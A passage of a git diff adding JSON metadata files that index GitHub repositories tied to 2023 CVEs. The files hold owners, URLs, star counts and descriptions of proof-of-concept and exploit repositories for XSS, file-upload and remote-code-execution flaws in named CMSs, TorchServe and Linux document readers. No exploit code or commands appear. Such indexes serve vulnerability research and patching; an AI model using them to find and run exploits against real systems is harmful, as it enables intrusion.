"CamillaFranceschini", + "id": 32276847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32276847?v=4", + "html_url": "https:\/\/github.com\/CamillaFranceschini", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CamillaFranceschini\/CVE-2023-4357", + "description": null, + "fork": false, + "created_at": "2024-06-20T13:20:43Z", + "updated_at": "2024-06-20T13:20:56Z", + "pushed_at": "2024-06-20T13:20:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43622.json b/2023/CVE-2023-43622.json new file mode 100644 index 0000000000..c418a77b1e --- /dev/null +++ b/2023/CVE-2023-43622.json @@ -0,0 +1,33 @@ +[ + { + "id": 807622468, + "name": "CVE-2023-43622", + "full_name": "visudade\/CVE-2023-43622", + "owner": { + "login": "visudade", + "id": 49928261, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49928261?v=4", + "html_url": "https:\/\/github.com\/visudade", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/visudade\/CVE-2023-43622", + "description": "CVE-2023–43622", + "fork": false, + "created_at": "2024-05-29T13:04:29Z", + "updated_at": "2024-05-29T13:19:21Z", + "pushed_at": "2024-05-29T13:19:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43646.json b/2023/CVE-2023-43646.json new file mode 100644 index 0000000000..b5a3f35210 --- /dev/null +++ b/2023/CVE-2023-43646.json @@ -0,0 +1,33 @@ +[ + { + "id": 845342008, + "name": "CVE-2023-43646", + "full_name": "200101WhoAmI\/CVE-2023-43646", + "owner": { + "login": "200101WhoAmI", + "id": 176820518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176820518?v=4", + "html_url": "https:\/\/github.com\/200101WhoAmI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/200101WhoAmI\/CVE-2023-43646", + "description": "redos", + "fork": false, + "created_at": "2024-08-21T04:11:44Z", + "updated_at": "2024-08-21T04:35:04Z", + "pushed_at": "2024-08-21T04:35:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43654.json b/2023/CVE-2023-43654.json new file mode 100644 index 0000000000..0f9e10c687 --- /dev/null +++ b/2023/CVE-2023-43654.json @@ -0,0 +1,64 @@ +[ + { + "id": 699309813, + "name": "ShellTorchChecker", + "full_name": "OligoCyberSecurity\/ShellTorchChecker", + "owner": { + "login": "OligoCyberSecurity", + "id": 102041143, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102041143?v=4", + "html_url": "https:\/\/github.com\/OligoCyberSecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OligoCyberSecurity\/ShellTorchChecker", + "description": "A tool that checks if a TorchServe instance is vulnerable to CVE-2023-43654", + "fork": false, + "created_at": "2023-10-02T11:33:37Z", + "updated_at": "2024-11-07T03:55:55Z", + "pushed_at": "2024-04-21T14:44:21Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 38, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 807005949, + "name": "CVE-2023-43654", + "full_name": "OligoCyberSecurity\/CVE-2023-43654", + "owner": { + "login": "OligoCyberSecurity", + "id": 102041143, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102041143?v=4", + "html_url": "https:\/\/github.com\/OligoCyberSecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OligoCyberSecurity\/CVE-2023-43654", + "description": "Demo for CVE-2023-43654 - Remote Code Execution in PyTorch TorchServe", + "fork": false, + "created_at": "2024-05-28T10:02:13Z", + "updated_at": "2024-07-09T11:32:21Z", + "pushed_at": "2024-06-06T08:09:09Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43667.json b/2023/CVE-2023-43667.json new file mode 100644 index 0000000000..38c8ad0a9c --- /dev/null +++ b/2023/CVE-2023-43667.json @@ -0,0 +1,95 @@ +[ + { + "id": 786209657, + "name": "CVE-2023-43667-2", + "full_name": "miguelc49\/CVE-2023-43667-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-43667-2", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:45:45Z", + "updated_at": "2024-04-14T17:40:52Z", + "pushed_at": "2024-04-15T23:51:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209678, + "name": "CVE-2023-43667-1", + "full_name": "miguelc49\/CVE-2023-43667-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-43667-1", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:45:51Z", + "updated_at": "2024-04-14T17:40:49Z", + "pushed_at": "2024-04-15T23:51:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209696, + "name": "CVE-2023-43667-3", + "full_name": "miguelc49\/CVE-2023-43667-3", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-43667-3", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:45:57Z", + "updated_at": "2024-04-14T17:40:59Z", + "pushed_at": "2024-04-15T23:51:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43757.json b/2023/CVE-2023-43757.json new file mode 100644 index 0000000000..05fcb21bf6 --- /dev/null +++ b/2023/CVE-2023-43757.json @@ -0,0 +1,33 @@ +[ + { + "id": 764535638, + "name": "CVE-2023-43757", + "full_name": "sharmashreejaa\/CVE-2023-43757", + "owner": { + "login": "sharmashreejaa", + "id": 161574704, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161574704?v=4", + "html_url": "https:\/\/github.com\/sharmashreejaa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sharmashreejaa\/CVE-2023-43757", + "description": null, + "fork": false, + "created_at": "2024-02-28T08:58:31Z", + "updated_at": "2024-02-28T08:58:31Z", + "pushed_at": "2024-02-28T08:58:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43770.json b/2023/CVE-2023-43770.json new file mode 100644 index 0000000000..1a865daf74 --- /dev/null +++ b/2023/CVE-2023-43770.json @@ -0,0 +1,64 @@ +[ + { + "id": 697409473, + "name": "CVE-2023-43770-POC", + "full_name": "s3cb0y\/CVE-2023-43770-POC", + "owner": { + "login": "s3cb0y", + "id": 43054353, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43054353?v=4", + "html_url": "https:\/\/github.com\/s3cb0y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s3cb0y\/CVE-2023-43770-POC", + "description": "A Proof-Of-Concept for the CVE-2023-43770 vulnerability. ", + "fork": false, + "created_at": "2023-09-27T17:08:23Z", + "updated_at": "2024-11-18T11:15:04Z", + "pushed_at": "2023-10-02T17:41:10Z", + "stargazers_count": 33, + "watchers_count": 33, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 33, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 697793875, + "name": "CVE-2023-43770-PoC", + "full_name": "knight0x07\/CVE-2023-43770-PoC", + "owner": { + "login": "knight0x07", + "id": 60843949, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60843949?v=4", + "html_url": "https:\/\/github.com\/knight0x07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/knight0x07\/CVE-2023-43770-PoC", + "description": "PoC for Stored XSS (CVE-2023-43770) Vulnerability", + "fork": false, + "created_at": "2023-09-28T13:43:25Z", + "updated_at": "2023-12-18T12:45:24Z", + "pushed_at": "2023-09-28T16:22:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43786.json b/2023/CVE-2023-43786.json new file mode 100644 index 0000000000..fbf4149148 --- /dev/null +++ b/2023/CVE-2023-43786.json @@ -0,0 +1,33 @@ +[ + { + "id": 744195023, + "name": "jfrog-CVE-2023-43786-libX11_DoS", + "full_name": "jfrog\/jfrog-CVE-2023-43786-libX11_DoS", + "owner": { + "login": "jfrog", + "id": 499942, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/499942?v=4", + "html_url": "https:\/\/github.com\/jfrog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jfrog\/jfrog-CVE-2023-43786-libX11_DoS", + "description": null, + "fork": false, + "created_at": "2024-01-16T20:04:05Z", + "updated_at": "2024-01-16T20:04:05Z", + "pushed_at": "2024-01-17T05:57:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43838.json b/2023/CVE-2023-43838.json new file mode 100644 index 0000000000..f7acc36f81 --- /dev/null +++ b/2023/CVE-2023-43838.json @@ -0,0 +1,33 @@ +[ + { + "id": 699413146, + "name": "CVE-2023-43838", + "full_name": "rootd4ddy\/CVE-2023-43838", + "owner": { + "login": "rootd4ddy", + "id": 129632649, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129632649?v=4", + "html_url": "https:\/\/github.com\/rootd4ddy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rootd4ddy\/CVE-2023-43838", + "description": "Public disclosure for CVE-2023-31584.", + "fork": false, + "created_at": "2023-10-02T15:27:07Z", + "updated_at": "2023-11-28T01:28:13Z", + "pushed_at": "2023-10-02T15:32:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43871.json b/2023/CVE-2023-43871.json new file mode 100644 index 0000000000..dc0fee1808 --- /dev/null +++ b/2023/CVE-2023-43871.json @@ -0,0 +1,33 @@ +[ + { + "id": 693581070, + "name": "CVE-2023-43871-WBCE-Arbitrary-File-Upload--XSS---Media", + "full_name": "sromanhu\/CVE-2023-43871-WBCE-Arbitrary-File-Upload--XSS---Media", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43871-WBCE-Arbitrary-File-Upload--XSS---Media", + "description": "WBCE 1.6.1 is affected by File Upload - XSS vulnerability that allows attackers to upload a PDF file with a hidden XSS that when executed will launch the XSS pop-up", + "fork": false, + "created_at": "2023-09-19T10:02:34Z", + "updated_at": "2023-09-28T22:37:30Z", + "pushed_at": "2023-09-19T10:07:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43872.json b/2023/CVE-2023-43872.json new file mode 100644 index 0000000000..b3695b6b6a --- /dev/null +++ b/2023/CVE-2023-43872.json @@ -0,0 +1,33 @@ +[ + { + "id": 693577949, + "name": "CVE-2023-43872-CMSmadesimple-Arbitrary-File-Upload--XSS---File-Manager", + "full_name": "sromanhu\/CVE-2023-43872-CMSmadesimple-Arbitrary-File-Upload--XSS---File-Manager", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43872-CMSmadesimple-Arbitrary-File-Upload--XSS---File-Manager", + "description": "CMSmadesimple 2.2.18 is affected by File Upload - XSS vulnerability that allows attackers to upload a PDF file with a hidden XSS that when executed will launch the XSS pop-up", + "fork": false, + "created_at": "2023-09-19T09:54:42Z", + "updated_at": "2023-09-28T22:45:40Z", + "pushed_at": "2023-09-19T10:00:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43873.json b/2023/CVE-2023-43873.json new file mode 100644 index 0000000000..f1d08f391a --- /dev/null +++ b/2023/CVE-2023-43873.json @@ -0,0 +1,33 @@ +[ + { + "id": 693584148, + "name": "CVE-2023-43873-e107-CMS-Stored-XSS---Manage", + "full_name": "sromanhu\/CVE-2023-43873-e107-CMS-Stored-XSS---Manage", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43873-e107-CMS-Stored-XSS---Manage", + "description": "e107 2.3.2 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Name field in the Manage Menu.", + "fork": false, + "created_at": "2023-09-19T10:10:13Z", + "updated_at": "2023-09-28T22:37:59Z", + "pushed_at": "2023-09-19T10:31:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43874.json b/2023/CVE-2023-43874.json new file mode 100644 index 0000000000..272bdfb53c --- /dev/null +++ b/2023/CVE-2023-43874.json @@ -0,0 +1,33 @@ +[ + { + "id": 693589060, + "name": "CVE-2023-43874-e107-CMS-Stored-XSS---MetaCustomTags", + "full_name": "sromanhu\/CVE-2023-43874-e107-CMS-Stored-XSS---MetaCustomTags", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43874-e107-CMS-Stored-XSS---MetaCustomTags", + "description": "e107 2.3.2 is affected by a Multiple Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Copyright and Author field in the Meta & Custom Tags Menu.", + "fork": false, + "created_at": "2023-09-19T10:23:08Z", + "updated_at": "2023-09-28T22:38:18Z", + "pushed_at": "2023-09-19T10:29:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43875.json b/2023/CVE-2023-43875.json new file mode 100644 index 0000000000..695fd49bc1 --- /dev/null +++ b/2023/CVE-2023-43875.json @@ -0,0 +1,33 @@ +[ + { + "id": 693884199, + "name": "CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation", + "full_name": "sromanhu\/CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation", + "description": "Subrion CMS 4.2.1 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload in the installation process.", + "fork": false, + "created_at": "2023-09-19T22:58:33Z", + "updated_at": "2023-09-28T22:38:33Z", + "pushed_at": "2023-09-19T23:03:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43876.json b/2023/CVE-2023-43876.json new file mode 100644 index 0000000000..e85886c735 --- /dev/null +++ b/2023/CVE-2023-43876.json @@ -0,0 +1,33 @@ +[ + { + "id": 693885753, + "name": "CVE-2023-43876-October-CMS-Reflected-XSS---Installation", + "full_name": "sromanhu\/CVE-2023-43876-October-CMS-Reflected-XSS---Installation", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43876-October-CMS-Reflected-XSS---Installation", + "description": "October CMS 3.4.16 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload in the installation process.", + "fork": false, + "created_at": "2023-09-19T23:05:11Z", + "updated_at": "2023-09-28T22:38:47Z", + "pushed_at": "2023-09-19T23:08:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43877.json b/2023/CVE-2023-43877.json new file mode 100644 index 0000000000..104dde77f8 --- /dev/null +++ b/2023/CVE-2023-43877.json @@ -0,0 +1,33 @@ +[ + { + "id": 695139320, + "name": "CVE-2023-43877-RiteCMS-Stored-XSS---Home", + "full_name": "sromanhu\/CVE-2023-43877-RiteCMS-Stored-XSS---Home", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43877-RiteCMS-Stored-XSS---Home", + "description": " RiteCMS 3.0 is affected by a Multiple Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Home settings page in the Administration Menu", + "fork": false, + "created_at": "2023-09-22T12:47:49Z", + "updated_at": "2023-09-28T22:42:34Z", + "pushed_at": "2023-09-22T13:04:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43878.json b/2023/CVE-2023-43878.json new file mode 100644 index 0000000000..aeff858638 --- /dev/null +++ b/2023/CVE-2023-43878.json @@ -0,0 +1,33 @@ +[ + { + "id": 695147163, + "name": "CVE-2023-43878-RiteCMS-Stored-XSS---MainMenu", + "full_name": "sromanhu\/CVE-2023-43878-RiteCMS-Stored-XSS---MainMenu", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43878-RiteCMS-Stored-XSS---MainMenu", + "description": "RiteCMS 3.0 is affected by a Multiple Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Main Menu - Items in the Administration Menu", + "fork": false, + "created_at": "2023-09-22T13:07:44Z", + "updated_at": "2023-09-28T22:43:03Z", + "pushed_at": "2023-09-22T13:12:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43879.json b/2023/CVE-2023-43879.json new file mode 100644 index 0000000000..6e9199e92e --- /dev/null +++ b/2023/CVE-2023-43879.json @@ -0,0 +1,33 @@ +[ + { + "id": 695149706, + "name": "CVE-2023-43879-RiteCMS-Stored-XSS---GlobalContent", + "full_name": "sromanhu\/CVE-2023-43879-RiteCMS-Stored-XSS---GlobalContent", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43879-RiteCMS-Stored-XSS---GlobalContent", + "description": "About RiteCMS 3.0 is affected by a Multiple Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Global Content Blocks in the Administration Menu", + "fork": false, + "created_at": "2023-09-22T13:14:02Z", + "updated_at": "2023-09-28T22:43:22Z", + "pushed_at": "2023-09-22T13:17:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43955.json b/2023/CVE-2023-43955.json new file mode 100644 index 0000000000..2faaf17f80 --- /dev/null +++ b/2023/CVE-2023-43955.json @@ -0,0 +1,35 @@ +[ + { + "id": 689433745, + "name": "com.phlox.tvwebbrowser", + "full_name": "actuator\/com.phlox.tvwebbrowser", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.phlox.tvwebbrowser", + "description": "CVE-2023-43955", + "fork": false, + "created_at": "2023-09-09T19:41:46Z", + "updated_at": "2024-01-17T19:59:18Z", + "pushed_at": "2023-11-07T16:45:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-43955" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44061.json b/2023/CVE-2023-44061.json new file mode 100644 index 0000000000..095ab2d73a --- /dev/null +++ b/2023/CVE-2023-44061.json @@ -0,0 +1,33 @@ +[ + { + "id": 695430538, + "name": "CVE-2023-44061", + "full_name": "soundarkutty\/CVE-2023-44061", + "owner": { + "login": "soundarkutty", + "id": 26168410, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26168410?v=4", + "html_url": "https:\/\/github.com\/soundarkutty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/soundarkutty\/CVE-2023-44061", + "description": " CVE-2023-44061 - Simple and Nice Shopping Cart Script V1.0", + "fork": false, + "created_at": "2023-09-23T06:45:32Z", + "updated_at": "2023-09-28T03:40:09Z", + "pushed_at": "2023-09-23T13:50:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4427.json b/2023/CVE-2023-4427.json new file mode 100644 index 0000000000..ea24220892 --- /dev/null +++ b/2023/CVE-2023-4427.json @@ -0,0 +1,33 @@ +[ + { + "id": 753386331, + "name": "CVE-2023-4427", + "full_name": "tianstcht\/CVE-2023-4427", + "owner": { + "login": "tianstcht", + "id": 32213198, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32213198?v=4", + "html_url": "https:\/\/github.com\/tianstcht", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tianstcht\/CVE-2023-4427", + "description": null, + "fork": false, + "created_at": "2024-02-06T02:29:06Z", + "updated_at": "2024-11-20T16:30:39Z", + "pushed_at": "2024-02-06T02:59:15Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 25, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44451.json b/2023/CVE-2023-44451.json new file mode 100644 index 0000000000..0913018898 --- /dev/null +++ b/2023/CVE-2023-44451.json @@ -0,0 +1,33 @@ +[ + { + "id": 744352278, + "name": "slippy-book-exploit", + "full_name": "febinrev\/slippy-book-exploit", + "owner": { + "login": "febinrev", + "id": 52229330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52229330?v=4", + "html_url": "https:\/\/github.com\/febinrev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/febinrev\/slippy-book-exploit", + "description": " CVE-2023-44451, CVE-2023-52076: RCE Vulnerability affected popular Linux Distros including Mint, Kali, Parrot, Manjaro etc. EPUB File Parsing Directory Traversal Remote Code Execution", + "fork": false, + "created_at": "2024-01-17T05:50:38Z", + "updated_at": "2024-06-17T18:26:57Z", + "pushed_at": "2024-01-17T10:42:12Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44452.json b/2023/CVE-2023-44452.json new file mode 100644 index 0000000000..6136a85c96 --- /dev/null +++ b/2023/CVE-2023-44452.json @@ -0,0 +1,33 @@ +[ + { + "id": 744427098, + "name": "atril_cbt-inject-exploit", + "full_name": "febinrev\/atril_cbt-inject-exploit", + "owner": { + "login": "febinrev", + "id": 52229330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52229330?v=4", + "html_url": "https:\/\/github.com\/febinrev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/febinrev\/atril_cbt-inject-exploit", + "description": "CVE-2023-44452, CVE-2023-51698: CBT File Parsing Argument Injection that affected Popular Linux Distros", + "fork": false, + "created_at": "2024-01-17T09:26:16Z", + "updated_at": "2024-03-06T04:43:54Z", + "pushed_at": "2024-01-17T09:36:25Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + 